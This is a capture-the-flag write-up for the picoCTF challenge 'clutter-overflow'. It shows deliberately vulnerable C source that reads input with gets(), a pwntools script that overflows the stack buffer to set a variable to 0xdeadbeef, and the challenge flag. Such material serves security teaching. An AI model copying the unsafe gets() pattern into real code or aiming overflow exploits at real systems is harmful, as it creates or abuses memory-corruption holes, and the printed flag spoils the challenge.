Binary Exploitation
{"author": ["ret2basic"]}

clutter-overflow

Solved by: ret2basic

Challenge

Clutter, clutter everywhere and not a byte to use.
nc mars.picoctf.net 31890

Recon

Recon

Source Code

1
#include <stdio.h>
2
#include <stdlib.h>
3
4
#define SIZE 0x100
5
#define GOAL 0xdeadbeef
6
7
int main(void)
8
{
9
long code = 0;
10
char clutter[SIZE];
11
12
setbuf(stdout, NULL);
13
setbuf(stdin, NULL);
14
setbuf(stderr, NULL);
15
16
puts(HEADER);
17
puts("My room is so cluttered...");
18
puts("What do you see?");
19
20
gets(clutter);
21
22
23
if (code == GOAL) {
24
printf("code == 0x%llx: how did that happen??\n", GOAL);
25
puts("take a flag for your troubles");
26
system("cat flag.txt");
27
} else {
28
printf("code == 0x%llx\n", code);
29
printf("code != 0x%llx :(\n", GOAL);
30
}
31
32
return 0;
33
}
Copied!

Solution

Overwrite the code variable with 0xdeadbeef.

Exploit

1
#!/usr/bin/env python3
2
from pwn import *
3
4
#--------Setup--------#
5
6
context(arch="amd64", os="linux")
7
elf = ELF("chall", checksec=False)
8
9
host = "mars.picoctf.net"
10
port = 31890
11
12
#--------Overwrite variable--------#
13
14
offset = 0x110 - 0x8
15
16
payload = flat(
17
b"A" * offset,
18
0xdeadbeef,
19
)
20
21
r = remote(host, port)
22
23
r.sendlineafter("What do you see?\n", payload)
24
25
r.interactive()
Copied!

Flag

1
picoCTF{c0ntr0ll3d_clutt3r_1n_my_buff3r}
Copied!
Last modified 5mo ago
Copy link